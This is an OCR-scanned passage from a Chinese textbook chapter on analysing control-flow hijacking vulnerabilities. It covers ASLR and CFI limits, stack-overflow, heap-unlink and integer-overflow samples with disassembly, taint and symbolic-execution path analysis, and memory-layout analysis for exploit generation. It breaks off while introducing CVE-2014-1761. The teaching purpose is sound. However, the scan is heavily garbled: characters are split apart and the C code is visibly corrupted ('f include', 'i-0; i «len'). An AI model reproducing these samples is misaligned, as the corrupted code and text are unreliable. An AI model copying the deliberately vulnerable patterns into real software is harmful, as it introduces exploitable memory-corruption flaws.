控制 流转 移 方法 使 用 了 当前 栈 顶 作为 “支点 ”, 因 而 堆栈 随机 化 改变 绝对 地 址 的 方式 对 溢 
出 利用 的 影响 有 限 。 

3. PEB、TEB 随机 化 

微软 公司 在 Windows XP SP2 中 开始 引入 PEB、TEB 的 地 址 随机 化 ,在 之 前 的 版 本 
中 ,PEB、TEB 采用 了 固定 基 址 (PEB: 0x7FFDF000,TEB: 0x7FFDE000) ,攻击 者 很 容易 
通过 硬 编码 实施 攻击 。 实 际 上 ,有 大 量 的 攻击 过 程 能 够 证 明 ,PEB 和 TEB 随机 化 效果 并 
不 像 想 象 的 那么 好 ,溢出 利用 时 仍然 存在 其 他 方法 获得 这 两 个 值 。 

ASLR 也 存在 一 定 的 局 限 性 。 首 先 ,ASLR 是 需要 和 DEP 配合 使 用 的 ,如 果 DEP 关 
闭 ,攻击 者 可 以 通过 程序 进程 表 结 构 来 获得 特定 DLL 的 加 载 基 址 。 其 次 ,ASLR 是 安全 
机 制 ,但 不 是 行业 标准 ,有 很 多 程序 或 程序 中 的 模块 并 不 支持 ASLR, 如 果 当 前 进程 中 存 
在 加 载 地 址 固定 的 模块 ,攻击 者 就 可 以 用 它 做 跳板 实施 漏洞 攻击 。 

除了 操作 系统 提供 的 防护 方法 之 外 ,在 学 术 界 也 提出 了 很 多 漏洞 防护 方法 ,近年 来 研 
究 的 热点 之 一 是 基于 控制 流 完整 性 检验 (Control Flow Integrity. CFT) 的 漏洞 防护 方法 。 
该 方法 由 Abadi 等 人 首先 提出 ,主要 目标 是 检查 系统 或 软件 执行 过 程 中 可 能 产生 的 控制 
流动 持 攻击 。 与 传统 方法 维护 函数 指针 和 函数 返回 地 址 的 完整 性 不 同 ,此 方法 构造 所 有 
间接 控制 流转 移 在 CFG 图 中 的 合法 目标 地 址 集合 。 在 控制 流转 移 发 生 时 , 校 验 目标 地 址 
是 否 在 合法 的 集合 内 ,并 以 此 作为 攻击 检测 的 依据 .该 方法 虽然 能 够 有 效 阻止 控制 流动 
持 攻击 ,但 难以 实现 ,对 系统 性 能 影响 较 大 。 


9.2 软件 漏洞 机 理 分 析 














软件 漏洞 攻击 的 总 体 流程 包括 漏洞 挖掘 ` 漏 洞 分 析 、 漏 洞 利用 3 个 部 分 。 软 件 漏洞 机 
理 分析 有 助 于 确定 漏洞 形成 原因 、 提 出 漏洞 攻击 方法 、 修 补漏 洞 和 制定 防御 方案 ,还 有 利 
于 进一步 提取 漏洞 利用 模式 进而 指导 同类 型 漏洞 挖掘 。 对 于 控制 流 劫持 类 漏洞 而 言 , 漏 
洞 机 理 分 析 主 要 关注 的 是 控制 流 劫持 点 、 漏 洞 胞 弱点、 脆弱 路 径 、 输 入 数据 的 内 存 布局 等 
关键 要 素 的 分 析 。 在 本 节 中 ,重点 论述 漏洞 分 析 的 要 素 和 其 对 应 的 分 析 方法 ,并 使 用 漏洞 
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分 析 实 例 来 明确 解释 相关 方法 和 要 素 。 

软件 漏洞 分 析 的 目标 是 获取 前 面 提出 的 软件 漏洞 要 素 信息 ,从 分 析 基 础 方法 上 来 说 ， 
近年 来 使 用 的 热点 方法 主要 包括 动态 污点 传播 ,符号 执行 .逻辑 公式 求解 等 。 本 节 重 点 论 
述 这 些 基 础 分 析 方法 在 漏洞 分 析 中 的 应 用 ,以 及 在 应 用 中 需要 解决 的 问题 。 
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漏洞 脆弱 点 指 的 是 软件 中 存在 错误 的 某 条 指令 或 某 个 函数 ,该 错误 导致 漏洞 形成 并 
能 被 攻击 者 利用 。 脆 弱点 与 漏洞 类 型 有 直接 关系 ,不 同类 型 的 漏洞 ,通常 其 所 对 应 的 脆弱 
点 也 不 同 ,在 本 书 所 针对 的 控制 流 劫持 漏洞 中 ,脆弱 点 是 程序 自身 存在 的 某 条 指令 或 函 
数 ,由 于 其 存在 问题 ,导致 程序 的 正常 控制 流 能 够 被 攻击 者 影响 ,转移 到 攻击 者 设 定位 置 。 
需要 说 明 的 是 ,脆弱 点 与 控制 流动 持 点 通常 不 同 , 在 控制 流动 持 类 漏洞 分 析 时 ,往往 需要 
同时 分 析 程 序 的 控制 流 支持 点 ,也 即 控 制 流转 移 的 方向 能 够 被 外 部 输入 数据 控制 的 指令 ， 
控制 流动 持 点 是 漏洞 利用 生成 的 关键 要 素 。 本 节 主 要 介绍 栈 溢出 、 堆 溢出 、 整 数 溢出 等 控 
制 流动 持 类 漏洞 的 脆弱 点 和 控制 流动 持 点 分 析 方 法 。 

1. 栈 溢出 的 脆弱 点 和 控制 流 劫持 点 

对 于 栈 溢出 漏洞 ,其 脆弱 点 是 覆盖 栈 空间 的 函数 或 指令 ,通常 情况 下 是 strcpy 函数 
或 movs 指令 。 下 面 以 一 段 存在 栈 溢出 漏洞 的 代码 为 例 描述 该 问题 。 假 设 存在 如 下 的 漏 
fen. 


f include < stdio.h» 
f include < string.h> 
f include «windows.h» 
void overflow(char * buf) 
f 
char des[5]- ""; 
strcpy (des, buf) ; 
return; 
) 
void main(int argc,char * argc[]) 
t 
char longbuf[100]- "aaaaaaaaaaaabbbbcccccccccccc" ; 
overflow (longbuf); 
return; 


P 


在 该 段 代 码 中 ,漏洞 存在 于 overflow 函数 中 ,程序 运行 时 该 函数 将 向 缓冲 区 中 写 人 
了 超 长 的 数据 ,导致 程序 发 生 非 法 内 存 访 问 异 常 。 将 该 程序 转换 为 二 进 制 形式 ,可 得 到 汇 
编 形 式 的 二 进 制 代码 如 下 : 

.text:00401000 ^ push ebp 


.text:00401001 ^ mov ebp, esp 
.text:00401003 sub esp, 0Ch 


.text:00401006 ^ mov eax, security cookie 
-text:0040100B xor eax, ebp 
.text:0040100D mov [ebptvar 4], eax 
-text:00401010 mov al, byte 4120E0 
-text:00401015 mov [ebp+ var C], al 
-text:00401018 xor ecx, ecx 
-text:0040101A mov [ebp+ var B], ecx 
-text:0040101D mov edx, [ebptarg 0] 

- text :00401020 push edx ; char * 
.text:00401021 lea eax, [ebptvar C] 
-text:00401024 push eax ; char * 
-text:00401025 call strcpy 
.text:0040102A add esp, 8 
-text:0040102D mov ecx, [ebptvar 4] 
.text:00401030 xor ecx, ebp 
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-text:00401032 call 6 security check cookiee 4 ; — security check cookie(x) 
.text:00401037 mov esp, ebp 

.text:00401039 pop ebp 

-text:0040103A retn 


在 本 例 中 ,脆弱 点 和 控制 流 劫持 点 的 分 析 需 要 关注 堆栈 中 函数 返回 地 址 的 变化 ,导致 
返回 地 址 被 覆盖 的 函数 即 为 程序 的 脆弱 点 ,引用 被 覆盖 后 地 址 的 指令 即 为 控制 流 劫持 点 。 
根据 代码 和 内 存 变化 关系 能 够 确定 ,该 程序 的 脆弱 点 在 地 址 00401025 位 置 的 strcpy PR 
数 , 而 漏洞 的 控制 流 劫持 点 在 于 0040103A 位 置 的 ret 指令 。 

2. 堆 浇 出 的 脆弱 点 和 控制 流动 持 点 

堆 溢 出 漏洞 按照 引起 错误 的 堆 相 关 数 据 的 位 置 可 以 划分 为 两 种 类 型 ,一 种 是 堆 的 管 
理 结构 , 另 一 种 是 后 续 堆 中 的 数据 。 覆 盖 后 续 堆 中 数据 的 情况 比较 容易 理解 , 即 如 果 后 续 
堆 有 函数 指针 或 其 他 指针 ,通过 向 前 一 个 堆 进行 超 长 的 读 写 ,使 后 续 堆 中 的 函数 指针 被 覆 
盖 , 当 程序 调用 后 续 堆 中 的 函数 指针 时 ,控制 流 会 转移 到 被 覆盖 的 地 址 上 。 

针对 堆 管理 结构 的 覆盖 形成 的 漏洞 是 由 于 堆 块 的 释放 回收 算法 的 实现 错误 引起 的 。 
主要 原因 是 释放 回收 过 程 中 使 用 的 Unlink 宏 ,Unlink 宏 的 作用 是 从 双向 链表 中 删除 其 
中 的 一 个 节点 ,具体 操作 是 把 双向 链表 中 的 前 一 个 节点 的 后 向 指针 指向 当前 节点 的 后 向 
指针 ,后 一 个 节点 的 前 向 指针 指向 当前 节点 的 前 向 指针 。 从 字面 上 理解 ,该 操作 过 程 并 不 
可 能 引发 任何 异常 操作 ,然而 在 操作 系统 中 使 用 了 当前 节点 的 指针 作为 起 始 位 置 , 寻 址 前 
向 节点 和 后 向 节点 ,使 得 指针 改写 发 生 了 错误 。 此 类 漏洞 属于 原理 设计 正常 的 情况 下 有 具 
体 算法 实现 中 出 现 的 问题 ,实际 上 ,无 论 设计 如 何 精妙 的 算法 ,在 实现 中 总 会 出 现 意 想 不 
到 的 问题 破坏 安全 性 。 根 据 其 原理 可 知 , 针 对 堆 管 理 结构 覆盖 形成 的 堆 溢出 漏洞 的 脆弱 
点 在 于 申请 和 释放 堆 内 存 的 函数 ,其 利用 点 为 Unlink 操作 。 这 里 以 一 个 实际 的 例子 进行 
介绍 。 假 设 在 Windows XP SP1 上 运行 如 下 的 代码 : 

int main (int argc,char * argv[]) 

t 
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HANDLE hHeap; 
char* heapl, heap2; 
// 在 系统 中 建立 堆 
hHeap- HeapCreate (0x00040000, 0, 0) ; 
// 从 建立 的 堆 中 分 配 2000 个 字 节 给 堆 块 heap 
heapl-HeapAlloc(hHeap,HEAP ZERO MEMORY, 2000) ; 
// 分 配 1500 个 字 节 给 堆 块 heap2 
heap2-HeapAlloc (hHeap, HEAP_ZERO MEMORY, 1500); 
// 把 堆 块 neap2 释放 ,之 后 堆 块 heap2 会 被 放 人 空闲 链表 
HeapFree (hHeap,0, heap2) ; 
// 假 设 长 度 为 N 的 字符 串 刚 好 可 以 覆盖 空闲 堆 块 heap2 的 双向 指针 
memcpy (heapl, "AAAA...BBBBCCCC", N) 
// 假 设 系统 在 下 次 分 配 时 返回 已 被 溢出 破坏 的 堆 块 , 则 攻击 发 生 
heap2= HeapAlloc(hHeap,HEAP ZERO MEMORY,1500); 
exit (0); 
} 


上 面 的 代码 触发 了 由 堆 释 放 回 收 算法 引起 的 漏洞 。 在 代码 的 一 开始 ,使 用 
HeapAlloc 从 堆 里 分 配 了 2000B 的 空间 ,并 将 分 配 的 堆 块 句柄 赋值 给 heap1: 


heapl= HeapAlloc (hHeap, HEAP ZERO MEMORY, 2000) ; 
之 后 ,又 申请 了 一 个 1500B 的 堆 块 heap2: 
heap2-HeapAlloc(hHeap,HEAP ZERO MEMORY,1500); 


马上 把 堆 块 heap2 释放 ,HeapFree(hHeap,0,heap2) ,根据 Windows 的 堆 管 理 算法 ， 
堆 块 heap2 就 会 被 放 到 空闲 链表 中 备用 。 随 后 向 堆 块 heapl 中 写 入 超 长 的 数据 ,具体 操 
作为 

memcpy (heapl, "AAAA*** BBBBCCCC", N); 


该 函数 调用 使 程序 发 生 了 溢出 ,覆盖 了 heap2 的 堆 管 理 结构 。 其 中 假设 BBBCCCC 8 
个 字 节 刚好 覆盖 了 其 中 的 双向 链表 指针 。 
在 溢出 之 后 ,程序 重新 申请 了 堆 块 并 假设 返回 已 溢出 破坏 的 堆 块 heap2 : 


heap2-HeapAlloc(hHeap,HEAP ZERO MEMORY,1500) ; 


此 时 堆 块 heap2 的 双向 链表 已 经 被 覆盖 了 。 在 这 样 的 条 件 下 ,重新 调用 HeapAlloc 
函数 时 ,由 于 需要 将 heap2 从 空闲 双向 链表 中 删除 , 即 通 过 如 图 9-7 所 示 的 流程 完成 ,从 
而 可 以 实现 内 存 任 意 写 攻击 。 

3. 整数 溢出 的 脆弱 点 与 控制 流 劫持 点 

整数 溢出 的 脆弱 点 通常 是 两 个 整数 进行 计算 的 指令 。 例 如 ,下 列 代码 包含 一 个 整数 
溢出 漏洞 ,漏洞 脆弱 点 是 len * sizeof (int) 指 令 , 当 len * sizeof(int) 的 计算 结果 超出 整数 
类 型 的 最 大 有 效 值 时 会 产生 溢出 ,其 最 终 计 算 结 果 会 远 远 小 于 预期 的 计算 结果 ,造成 分 配 
的 内 存 大 小 小 于 预期 的 大 小 ,后 续 再 向 其 中 写 入 数据 时 会 产生 堆 访 问 异 常 。 该 函数 的 控 
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alloc 
heap2-> Blink- > Flink=Chunk->Flink /底层 代码 实现 mov [CCCC],RRBR 
heap2-> Flink-> Blink=Chunk-> Blink ”// 底 层 代码 实现 mov [BBBB+4],CCCC 
图 9-7 空闲 堆 块 分 配 所 导致 的 内 存 攻击 


制 流动 持 点 与 实际 内 存 布 局 情况 相关 ,可 能 是 后 续 堆 中 的 虚 函 数 指针 ,也 可 能 是 堆 管 理 数 
据 结 构 能 够 修改 的 双 字 位 置 。 


int myfunction (int * array, int len) { 
int * myarray, i; 
// 这 里 如 果 len 是 一 个 很 大 的 正 数 ,那么 乘法 的 结果 可 能 发 生 溢出 
// 洲 出 后 由 于 整数 表示 小 于 实际 的 大 小 ,因此 分 配 的 内 存 会 小 于 预期 的 大 小 
myarray-malloc(len * sizeof(int)); 
// 程 序 根据 输入 的 大 小 向 申请 的 内 存 中 写 人 数据 ,发 生 溢出 
for(i-0; i «len; it*)( 
myarray[i]-array[i]; 
i 
return myarray; 


) 


922 软件 漏洞 路 径 分 析 


软件 漏洞 路 径 分 析 的 目标 是 提取 程序 由 数据 输入 点 或 程序 执行 人 口 到 漏洞 脆弱 点 的 
路 径 ,基于 该 路 径 可 进一步 展开 漏洞 成 因 分 析 、 漏 洞 利用 生成 等 工作 。 通 常情 况 下 ,针对 
软件 漏洞 路 径 的 分 析 主要 基于 Windbg 或 Ollydbg 手工 开展 ,需要 耗费 大 量 的 人 力 。 污 
点 传播 是 一 种 新 兴 的 程序 分 析 技术 ,其 主要 思想 是 将 用 户 输入 作为 污点 源 , 在 程序 执行 过 
程 中 追踪 污点 源 的 传播 ,所 有 直接 或 间接 受 污点 源 影响 的 变量 都 是 被 污染 的 变量 , 称 为 污 
点 数据 ,操作 污点 数据 的 指令 序列 称 为 污点 传播 过 程 。 污 点 传播 具体 方法 在 前 面 章节 已 
经 详细 讨论 ,此 处 不 再 费 述 ,在 漏洞 分 析 中 ,污点 传播 主要 用 于 追踪 输入 数据 在 漏洞 程序 
中 的 处 理 过 程 , 包 括 路 径 指 令 序列 提取 、 路 径 条 件 提取 和 内 存 布局 分 析 , 下 面 分 别 进行 
介绍 。 

1. 基于 污点 传播 的 路 径 指令 序列 提取 
件 , 并 解决 污点 传播 回溯 分 析 等 问题 。 首 先是 确定 污点 源 , 随 后 程序 的 监控 起 点 和 关注 的 
输入 数据 内 容 就 确定 了 。 通 常情 况 下 ,污点 源 应 当 在 输入 数据 被 读 人 到 内 存 时 被 引入 ,也 
就 是 以 WSARecv,Recv,ReadFile, MapViewOfFile 等 输入 输出 函数 的 返回 位 置 为 污点 源 
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引入 点 。 使 用 较 多 的 污点 源 函 数 见 表 9-2。 实 际 上 ,由 于 Windows 系统 的 复杂 性 ,输入 输 
出 函数 经 过 多 层 封装 ,实现 相同 功能 的 函数 在 不 同 层次 上 用 Io、Zw、Nt 等 前 绥 命 名 ,在 漏 
洞 分 析 中 需要 根据 分 析 目 标 调整 监控 的 函数 ,如 果 监 控 的 函数 过 于 底层 ,反倒 可 能 出 现 上 
层 函 数 对 其 进行 包装 ,导致 元 余 信 息 增多 的 问题 。 


表 9-2 动态 污点 传播 分 析 常 用 的 污点 源 函数 











序号 函数 类 别 主要 函数 备 注 
1 | Recv 类 recv, WSARecv 接收 网 络 数据 并 存放 在 缓冲 区 中 
2 File 类 ReadFile, NtReadFile 读 取 文件 数据 并 存放 在 缓冲 区 中 





3 Register 类 RegQueryValueEx, RegQueryValue | 查询 注册 表 键 值 并 放 在 缓冲 区 中 


内 核 态 驱动 通信 函数 ,几乎 所 有 的 1/0 
4 DeviceloControl | DeviceloControl 操作 均 通过 该 函数 实现 Ringo 和 
Ring3 的 接口 














通常 在 污点 传播 分 析 中 ,针对 于 Recv、ReadFile 等 函数 的 污点 源 标记 都 能 够 通过 函 
数 的 传人 参数 和 返回 值 确定 所 需 标 记 内 容 的 起 始 地 址 和 长 度 。 但 在 实际 分 析 中 也 会 发 现 
部 分 特殊 情况 ,如 使 用 MapViewOfFile 直接 将 文件 映射 进 内 存 , 这 种 操作 方式 使 得 程序 
可 以 直接 使 用 基地 址 指针 十 偏 移 的 方式 进行 文件 读 取 操作 ,但 通过 该 函数 仅 能 够 获取 所 
需 标 记 内 容 的 起 始 地 址 ,长度 无 法 通过 该 函数 的 传 入 传 出 参数 和 返回 值得 到 。 针 对 该 问 
题 ,如 果 是 直接 采用 同 平台 Hook( 挂 钧 ) 的 技术 ,例如 使 用 Intel Pin 实现 的 动态 污点 传播 
分 析 , 则 需要 通过 MapViewOfFile 函数 的 传人 参数 句柄 查询 文件 长 度 ,以 确定 映射 在 内 
存 中 的 区 域 长 度 。 

污点 传播 需要 污点 源 和 污点 传播 规则 相互 配合 才能 达到 预期 的 分 析 目 标 ,因而 污点 
传播 规则 设计 也 是 在 分 析 中 较为 关键 的 一 项 内 容 , 污 点 传播 规则 设计 不 完善 ,可 能 会 引发 
污点 爆炸 或 漏 标记 。 污 点 传播 规则 制定 的 方法 在 前 面 的 章节 中 已 有 论述 ,本 节 主 要 论述 
基于 污点 传播 追踪 程序 执行 流程 实际 工作 中 较为 常见 的 问题 和 解决 方法 。 

2. 基于 符号 执行 的 路 径 条 件 提取 

脆弱 路 径 条 件 的 提取 是 确定 漏洞 触发 方式 .生成 漏洞 攻击 代码 的 关键 支撑 信息 。 漏 
洞 路 径 条 件 提取 的 关键 在 于 : 确定 使 控制 流转 移 到 脆弱 路 径 的 关键 节点 ,以 及 分 析 这 些 
节点 相互 之 间 的 数据 依赖 和 控制 依赖 关系 。 为 了 聚焦 在 路 径 条 件 提取 上 ,假设 分 析 的 前 
提 是 已 经 在 程序 的 实际 运行 过 程 中 找到 了 一 条 脆弱 路 径 。 

这 里 以 前 面 介绍 过 的 整数 溢出 漏洞 为 例 ,通过 IDA Pro 反 编 译 ,得 到 该 函数 的 汇编 
代码 如 下 : 





.text:00401000 sub 401000 proc near ; CODE XREF: sub 401060+ 7p 
-text:00401000 var 8 -dwordptr -8 

-text:00401000 var 4 -dwordptr -4 

-text:00401000 arg 0 -dwordptr 8 

-text:00401000 arg 4 -dword ptr OCh 


-text:00401000 push ebp 
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-text:00401001 mov ebp, esp 
-text:00401003 sub esp, 8 
-text:00401006 push esi 
-text:00401007 mov eax, [ebptarg 4] 
-text:0040100A shl eax, 2 
-text:0040100D push eax ; size 七 
-text:0040100E call _malloc 
-text:00401013 add esp, 4 
-text:00401016 mov ebptvar 8], eax 
.text:00401019 cmp ebptvar 8], 0 
-text:0040101D jnz Short loc 401024 
.text:0040101F or eax, OFFFFFFFFh 
-text:00401022 jmp Short loc 401055 
.text:00401024 mov ebptvar 4], 0 
-text :0040102B jmp short loc 401036 
-text:0040102D mov ecx, [ebptvar 4] 
.text:00401030 add ecx, 1 
.text:00401033 mov ebptvar 4], ecx 
.text:00401036 mov edx, [ebptvar 4] 
.text:00401039 cmp edx, [ebptarg 4] 
-text:0040103C jge short loc 401052 
.text:0040103E mov eax, [ebptvar 4] 
.text:00401041 mov ecx, [ebptvar 8] 
-text:00401044 mov edx, [ebptvar 4] 
.text:00401047 mov esi, [ebptarg 0] 
-text:0040104A mov edx, [esitedx* 4] 
-text :0040104D mov [ecx* eax * 4], edx 
-text:00401050 jmp short loc 40102D 
.text:00401052 mov eax, [ebptvar 8] 
-text:00401055 pop esi 
-text:00401056 mov esp, ebp 
-text:00401058 pop ebp 
-text:00401059 retn 


-text:00401059 sub 401000 endp 


该 函数 的 控制 流转 移 在 于 0040101D 地 址 的 jnz 和 0040103C 地 址 的 jge。 在 实际 执 
行 中 ,0040101D 地 址 的 jnz 正常 实施 了 跳 转 ,0040103C 地 址 的 jge 处 在 循环 中 ,在 经 过 多 
次 执行 之 后 实施 了 跳 转 。 首 先 以 0040101D 地 址 的 jnz 为 起 点 进行 逆向 回溯 ,该 指令 受到 
00401019 地 址 的 cmp 指令 的 影响 ,将 Lebp 十 var_8] 偏 移 的 内 容 与 数值 0 进行 比较 ,该 指 
令 引 用 的 [ebp 十 var_8] 地 址 内 容 由 前 一 条 mov 指令 赋值 ,数值 的 来 源 是 eax 寄存 器 。 继 
续 向 前 回溯 ,可 知 eax 的 值 实际 上 是 malloc 的 返回 值 , 即 该 指令 操作 的 污点 数据 源 是 
malloc 的 返回 值 。 由 于 该 数值 由 系统 确定 ,无 法 回溯 到 输入 数据 ,针对 第 一 条 jnz 指令 的 
回溯 到 此 结束 ,该 指令 的 条 件 可 表示 为 result(malloc) 关 0。 
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针对 第 二 条 控制 流转 移 指令 0040103C 地 址 的 jge, 其 控制 流转 移 方向 受到 前 一 条 
cmp 指令 影响 ,将 edx 和 [ebp 十 arg_4] 进 行 比较 。 其 中 [ebp 十 arg_4] 可 直接 回溯 到 输入 
数据 的 污点 源 ,edx 由 前 面 的 mov 指令 确定 ,引用 了 [ebp 十 var_4] 的 内 容 , 该 内 容 由 
00401033 地 址 指令 的 ecx 得 到 。 根 据 该 污点 向 上 回溯 ,可 得 到 污点 产生 的 位 置 在 于 
00401024 的 mov。 通 过 提取 每 一 条 指令 的 计算 关系 和 操作 关系 ,可 得 最 终 的 约束 条 件 为 
ecx- [ebp-Farg 4]. 

为 了 帮助 读者 理解 路 径 约 束 提取 的 原理 ,本 节 用 了 一 个 简单 的 例子 描述 约束 条 件 的 
提取 方法 ,在 实际 的 程序 分 析 中 ,为 了 得 到 能 够 触发 脆弱 路 径 的 输入 ,需要 将 引发 该 漏洞 
的 条 件 放 在 一 起 求解 。 实 际 上 ,程序 的 实际 样本 往往 会 产生 以 太 字 节 (TB) 为 单位 的 执行 
记录 ,其 中 的 控制 流转 移 也 可 能 产生 数 千 甚至 上 万 的 约束 条 件 , 复 杂 度 远 远 超 过 本 实例 的 
情况 。 

3. 软件 漏洞 分 析 中 的 特殊 情况 

漏洞 的 成 因 通常 都 较为 复杂 ,因而 在 实际 的 漏洞 分 析 中 ,污点 传播 规则 需要 根据 具体 
的 分 析 目 标 制 定 , 分 析 结 果 也 往往 不 像 理 论 预 想 的 那么 乐观 ,很 多 情况 下 需要 人 工 干预 或 
在 分 析 过 程 中 修正 规则 ,才能 够 获得 较为 准确 的 结果 。 其 中 几 种 较为 常见 的 情况 如 下 。 

(1) 指令 集 支 持 对 于 路 径 分 析 准 确 度 的 影响 。 污 点 传播 通常 针对 Intel 指令 集 、 
ARM 指令 集 或 中 间 语 言 指 令 集 展开 ,其 中 Intel 指令 集 由 于 指令 格式 复杂 ,用 法 多 样 ,对 
分 析 准 确 度 影 响 也 较 大 。 一 个 较为 突出 的 例子 是 指针 的 使 用 ,假设 一 段 汇编 程序 使 用 
mov eax，[ecxj] 进 行 指针 数据 访问 ,在 ecx 寄存 器 是 污点 的 情况 下 ,最终 得 到 的 结果 eax 
是 否 需 要 标记 为 污点 ? 如 果 直 接 将 所 有 此 类 指令 都 使 用 相同 的 规则 标记 为 污点 , 则 会 发 
生 污 点 过 标记 ,产生 大 量 无 用 的 结果 干扰 分 析 , 如 果 直 接 忽略 则 会 发 生 污点 漏 标记 。 因 
此 ,这 种 情况 采用 全 局 的 统一 规则 会 产生 大 量 非 预期 的 污点 标记 ,需要 辅助 人 工分 析 并 根 
据 漏洞 的 情况 灵活 应 用 规则 。 

(2) JavaScript 等 脚本 对 分 析 的 影响 。JavaScript、VBScript 等 脚本 解码 引擎 通过 识 
别 关键 字 ,根据 关键 字形 成 实际 执行 的 代码 ,实际 上 该 关键 字 主 要 用 于 字符 串 比 较 , 与 后 
面 产生 的 数据 内 容 并 非 直接 的 运算 关系 。 同 时 ,脚本 的 关键 字 识 别 通常 使 用 有 限 状 态 自 
动机 (Deterministic Finite Automaton, DFA) ,自动 机 算法 往往 引起 污点 传播 中 断 , 此 外 ， 
ANSI 字符 向 Unicode 字符 转换 、 类 型 和 对 象 声 明 等 也 会 带 来 污点 传播 中 断 ,都 需要 根据 
漏洞 的 实际 分 析 情 况 进 行 传播 规则 的 调整 。 

在 实际 的 漏洞 分 析 中 ,还 可 能 遇 到 其 他 的 特殊 情况 ,例如 在 程序 中 带 有 混淆 和 加 密 ， 
通常 混淆 和 加 密 的 要 求 是 把 每 一 个 字 节 的 数据 产生 影响 扩散 到 整个 数据 区 域 ,因而 当 分 
析 人 员 把 输入 数据 当 作 污 点 源 进行 标记 并 进行 污点 传播 分 析 后 ,往往 发 现 几乎 全 部 输入 
数据 都 被 标记 成 了 污点 ,在 这 样 的 条 件 下 获取 的 污点 传播 路 径 往 往 等 同 于 完整 路 径 , 这 样 
的 结果 很 难 降低 分 析 的 复杂 度 , 反 而 有 可 能 因为 污点 记录 爆炸 使 得 分 析 难 度 更 大 。 

基于 污点 传播 的 漏洞 路 径 分 析 的 最 后 环节 为 污点 传播 的 终止 条 件 , 该 问题 是 基于 污 
点 传播 进行 漏洞 分 析 的 关键 问题 。 污 点 传播 的 终止 条 件 可 较为 笼统 地 描述 为 : 被 污点 数 
据 所 污染 的 变量 是 否 被 用 来 执行 敏感 操作 。 对 于 控制 流 劫持 类 漏洞 而 言 ,该 条 件 可 被 细 
化 为 污点 数据 是 否 能 够 影响 控制 流转 移 的 方向 。 
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923 软件 漏洞 内 存 布局 分 析 


软件 漏洞 内 存 布局 分 析 的 主要 目标 是 : 当 程 序 的 脆弱 点 被 触发 时 ,确定 程序 读 入 数 
据 在 内 存 中 的 布局 情况 ,分 析 漏 洞 利用 所 需 的 关键 数据 所 在 位 置 ,为 漏洞 成 因 分 析 、 漏 洞 
利用 生成 提供 支撑 。 针 对 不 同 的 漏洞 ,其 所 需要 分 析 的 内 存 布局 信息 是 不 同 的 。 漏 洞 布 
局 分 析 的 主要 目标 是 分 析 读 入 的 数据 在 内 存 中 的 放置 情况 ,根据 内 存 的 大 小 、 一 致 性 (时 
序 上 判断 内 存 可 用 性 是 否 保持 一 致 ;判定 当前 的 内 存 布局 ,能 否 用 于 存放 攻击 代码 ,攻击 
代码 是 否 可 以 利用 读 和 人 数据 的 过 程 进行 变形 等 。 输 入 数据 在 被 读 和 人 到 程序 并 进行 处 理 之 
后 ,可 能 存在 输入 数据 直接 映射 和 输入 数据 经 过 数学 运算 两 种 方式 。 其 中 经 过 数学 运算 
的 数据 又 可 分 为 可 逆 计 算 以 及 不 可 逆 计 算 。 在 软件 漏洞 分 析 中 ,主要 关注 输入 数据 直接 
映射 和 数学 计算 可 逆 的 映射 两 种 。 

1. 输入 数据 直接 映射 

输入 数据 直接 映射 如 图 9-8 所 示 , 指 的 是 程序 通过 系统 API 从 外 部 读 入 的 数据 被 直 
接 复制 到 系统 内 存 中 ,在 程序 运行 到 胞 弱点 时 ,未 发 生 任何 改变 。 由 于 数据 被 直接 映射 进 
内 存 ,因此 分 析 的 目标 主要 针对 输入 数据 读 入 内 存 后 连续 映射 区 域 的 地 址 \ 长 度 等 基础 性 
信息 ,此 类 基础 信息 能 够 直接 用 来 判定 攻击 代码 的 放置 区 域 。 
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图 9-8 输入 数据 直接 映射 


2. 输入 数据 可 逆 计 算 后 映射 

输入 数据 可 逆 计 算 后 映射 , 指 的 是 输入 数据 通过 系统 API 读 入 内 存 后 , 当 到 达 程 序 
脆弱 点 时 ,已 经 经 过 了 一 定 的 数学 运算 。 由 于 数据 经 过 运算 ,因此 除了 考虑 内 存 区 间 的 起 
始 地 址 ,大 小 等 通用 因素 之 外 ,还 需要 根据 数据 的 处 理 过程 , 考 虑 算法 是 否 可 逆 , 通 常情 况 
下 主要 针对 可 逆 的 算法 设计 攻击 代码 ,一 方面 攻击 代码 能 够 在 内 存 中 正确 展开 , 另 一 方面 
程序 的 数学 运算 也 可 以 视 为 独特 的 代码 加 密 过 程 ,提高 了 攻击 代码 的 查 杀 难度 。 对 于 算 
法 不 可 道 的 情况 ,也 可 根据 算法 定制 攻击 代码 ,使 其 在 经 过 数学 运算 之 后 呈现 为 攻击 者 所 
希望 的 样子 ,由 于 此 种 方法 难度 较 大 ,因而 通常 针对 此 类 情况 考虑 得 较 少 。 
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3. 输入 数据 映射 分 析 方法 

在 软件 漏洞 分 析 中 ,对 于 内 存 布局 的 分 析 是 利用 经 过 修改 的 污点 传播 算法 实现 的 。 
具体 算法 是 : 创建 影子 内 存 映 射 表 ShadowMemory, 以 字 节 为 单位 标记 污点 传播 内 存 的 
状态 ,通常 单个 进程 的 4GB 虚拟 内 存 空间 可 用 4GB/8—512MB 的 映射 表 完 全 记录 (以 字 
节 为 单位 的 污点 传播 ) 。 针 对 每 一 条 指令 ,制定 污点 传播 规则 ,追踪 进程 的 执行 过 程 , 对 每 
一 条 指令 进行 污点 传播 计算 ,并 且 在 指令 分 析 完 成 后 实时 修改 映射 表 中 的 内 存 状态 ,如 
图 9-9 所 示 。 从 污点 传播 计算 的 过 程 很 容易 看 出 ,在 程序 执行 的 每 一 刻 , 其 内 存 污点 状态 
只 需要 查询 映射 表 中 标记 为 1 的 记录 即 可 。 在 判定 连续 的 污点 数据 后 ,还 需要 分 析 该 连 
续 的 污点 数据 是 否 由 同一 个 数据 源 产生 ,以 及 污点 数据 是 被 直接 映射 进 内 存 , 还 是 经 过 可 
逆 的 数学 运算 后 被 映射 进 内 存 的 。 该 问题 的 确定 方法 是 ,对 于 每 个 标记 为 1 的 污点 传播 
记录 ,以 其 为 起 点 进行 污点 传播 回溯 ,根据 回溯 的 数据 源 判 定 是 否 为 连续 污点 源 , 如 果 是 
连续 污点 源 , 则 进一步 分 析 污 点 传播 过 程 中 是 否 有 数学 运算 指令 ,是 否 可 逆 。 
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图 9-9 数据 映射 分 析 方法 


924 软件 漏洞 分 析 实 例 


本 节 通 过 软件 漏洞 分 析 实 例 详 细 论 述 具 体 分 析 方法 在 漏洞 分 析 中 的 应 用 过 程 。 由 于 
本 书 主要 关注 控制 流 劫持 类 漏洞 ,因此 采用 CVE-2014-1761 作为 分 析 的 用 例 。 该 漏洞 针 
